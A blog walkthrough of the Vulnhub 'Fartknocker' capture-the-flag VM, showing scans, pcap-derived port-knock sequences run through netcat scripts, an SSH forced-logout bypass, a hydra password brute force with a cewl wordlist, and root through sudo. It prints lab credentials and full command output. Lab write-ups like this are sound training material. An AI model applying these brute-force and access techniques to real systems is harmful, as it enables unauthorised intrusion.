Thursday 16 April 2015

TopHatSec - Fartknocker VM - Hosted on Vulnhub



Discovery:

 
arp gives:

 

Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.56.102           ether   08:00:27:91:bc:58   C                     vboxnet0




 

Scan:


Nmap 6.47 scan initiated Sat Apr 11 10:48:06 2015 as: nmap -sS -A -p- -oA fartknocker 192.168.56.102
Nmap scan report for 192.168.56.101
Host is up (0.0012s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:91:BC:58 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.11 - 3.14
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   1.18 ms 192.168.56.102

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
# Nmap done at Sat Apr 11 10:48:23 2015 -- 1 IP address (1 host up) scanned in 17.77 seconds





 
The scan shows a webserver running




 

Webscan:

- Nikto v2.1.5/2.1.5
+ Target Host: 192.168.56.101
+ Target Port: 80
+ GET /: Server leaks inodes via ETags, header found with file /, fields: 0x68 0x5105a792cb1f8
+ GET /: The anti-clickjacking X-Frame-Options header is not present.
+ OPTIONS /: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ -3233: GET /icons/README: /icons/README: Apache default file found
.


 

Not much from that.......

So i decided to visit the page with a browser









The link Wooah gives pcap1.pcap




Opening it up with Wireshark, gives allot of ICMP flying back and fourth, however lower down something is happening.









 
TCP Ports 7000, 8000, 9000 and 8888 are used.
 

I probed into this, knowing that knockd was a possibility (given there is a webserver running with no means of remote administration in place)

Given my python abilities are... basic to say the least, i knocked up a simple bash script utilising netcat





cat knock1.sh
#!/bin/bash
nc -v 192.168.56.102 7000
nc -v 192.168.56.102 8000
nc -v 192.168.56.102 9000
nc -v 192.168.56.102 8888


After a few frustrating attempts, it finally worked!






 

./knock1.sh
nc: connect to 192.168.56.102 port 7000 (tcp) failed: Connection refused
nc: connect to 192.168.56.102 port 8000 (tcp) failed: Connection refused
nc: connect to 192.168.56.102 port 9000 (tcp) failed: Connection refused
Connection to 192.168.56.102 8888 port [tcp/*] succeeded!
/burgerworld/


 

Visiting the site with a browser gives:










The link gives another pcap file, pcap2.pcap.




 



Wireshark shows some more ICMP and ARP traffic.
however more connections are established, to different ports

Connections to TCP 21, UDP 22, TCP 80 and 8080, then a connection was estabished to http-alt (port 8080) and data went back and fourth.








So i probed with another bash script to ports 1,3,3,7 to no avail.
I decided to go slightly more upmarket and use knock-knock.
After a bit of tweaking the script kicked in.



[-] Scanning 192.168.56.102 with Nmap, this could take a minute...go get some coffee

[-] Sending default knockd sequence to 192.168.56.102

[-] Scanning again...too soon for more coffee???

[+] 1 new port(s) opened...
(1337, 'tcp')

Writing to output file - outfile.txt

it showed port 1337  was now open


nc -vv 192.168.56.102 1337
Connection to 192.168.56.102 1337 port [tcp/*] succeeded!
/iamcornholio/











No Pcap file this time though, however "all about that base" was a clue



 echo "T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK" > base64_encoded.txt

base64 -d base64_encoded.txt
Open up SSH: 8888 9999 7777 6666




Another knocking sequence, so i returned to my bash script method.



 #!/bin/bash
nc -v 192.168.56.102 8888
nc -v 192.168.56.102 9999
nc -v 192.168.56.102 7777
nc -v 192.168.56.102 6666
nc -v 192.168.56.102 22




./knock4.sh
nc: connect to 192.168.56.102 port 8888 (tcp) failed: Connection refused
nc: connect to 192.168.56.102 port 9999 (tcp) failed: Connection refused
nc: connect to 192.168.56.102 port 7777 (tcp) failed: Connection refused
nc: connect to 192.168.56.102 port 6666 (tcp) failed: Connection refused
Connection to 192.168.56.102 22 port [tcp/ssh] succeeded!
SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2



Port 22 is not open, nice one!




 ############################################
# CONGRATS! YOU HAVE OPENED THE SSH SERVER                            #
# USERNAME: butthead                                                                              #
# PASSWORD: nachosrule                                                                           #
############################################




However this was not to be as smooth as i initally thought..



butthead@192.168.56.102's password:
Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.13.0-46-generic i686)

 * Documentation:  https://help.ubuntu.com/
Last login: Sun Apr 12 15:01:54 2015 from 192.168.56.1
You are only logging in for a split second! What do you do!
Connection to 192.168.56.102 closed.

 


A little digging in the man pages of ssh i stumbled across it


 

NAME
     ssh — OpenSSH SSH client (remote login program)

SYNOPSIS
     ssh [-1246AaCfgKkMNnqsTtVvXxYy] [-b bind_address] [-c cipher_spec] [-D [bind_address:]port]
         [-E log_file] [-e escape_char] [-F configfile] [-I pkcs11] [-i identity_file]
         [-L [bind_address:]port:host:hostport] [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option]
         [-p port] [-Q cipher | cipher-auth | mac | kex | key] [-R [bind_address:]port:host:hostport]
         [-S ctl_path] [-W host:port] [-w local_tun[:remote_tun]] [user@]hostname [command]





ssh -l butthead 192.168.56.102 /bin/bash
butthead@192.168.56.102's password:




 After a few seconds waiting thinking i gave the "ls" command




ls
files.txt
nachos
id
uid=1001(butthead) gid=1001(butthead) groups=1001(butthead)
cat nachos
Great job on getting this far.

Can you login as beavis or root ?




this was another hint..



cat /etc/passwd | grep beavis
beavis:x:1000:1000:beavis,,,:/home/beavis:/bin/bash





I took a while looking through the home folder of "beavis" and not finding much, I decided to set hydra loose on the ssh service.


 After no luck using conventional wordlists I used cewl to generate my own from a wikipedia page on Beavis and Butthead




[DATA] attacking service ssh on port 22
[ERROR] ssh protocol error
[ERROR] ssh protocol error
---snip-----
[ERROR] ssh protocol error
[22][ssh] host: 192.168.56.101   login: beavis   password: mikejudge
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-04-12 22:08:18





 Hydra had found a valid password for the user "beavis"

Logging in....
 



beavis@192.168.56.102's password:
Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.13.0-46-generic i686)

 * Documentation:  https://help.ubuntu.com/
Last login: Sun Apr 12 17:07:32 2015 from 192.168.56.1
beavis@Huhuhhhhhuhuhhh:~
$





It was starting to go very well, time to start looking for ways to obtain root...




beavis@Huhuhhhhhuhuhhh:~$ id
uid=1000(beavis) gid=1000(beavis) groups=1000(beavis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare)
 
beavis@Huhuhhhhhuhuhhh:~$ sudo -l
[sudo] password for beavis: 

Matching Defaults entries for beavis on Huhuhhhhhuhuhhh:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User beavis may run the following commands on Huhuhhhhhuhuhhh:
    (ALL : ALL) ALL
beavis@Huhuhhhhhuhuhhh:~$




A quick check of id shows beavis is : groups 27(sudo)  and can commands ( ALL : ALL ) ALL






beavis@Huhuhhhhhuhuhhh:~$ sudo bash
root@Huhuhhhhhuhuhhh:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Huhuhhhhhuhuhhh:~# cd /root
root@Huhuhhhhhuhuhhh:/root# ls
SECRETZ
root@Huhuhhhhhuhuhhh:/root# more SECRETZ
You have done a great job, if you can see this, please shoot me an email
and let me know that you have beat this box!

SECRET = "LIVE LONG AND PROSPER, REST IN PEACE MR. SPOCK"

admin@top-hat-sec.com


root@Huhuhhhhhuhuhhh:/root#



Fin:





Thanks to everyone at Vulnhub for the guidance over the time ive been there.

Special Thanks To Tophatsec for creating this challenge.


2 comments:

  1. This comment has been removed by a blog administrator.

    ReplyDelete
  2. This comment has been removed by the author.

    ReplyDelete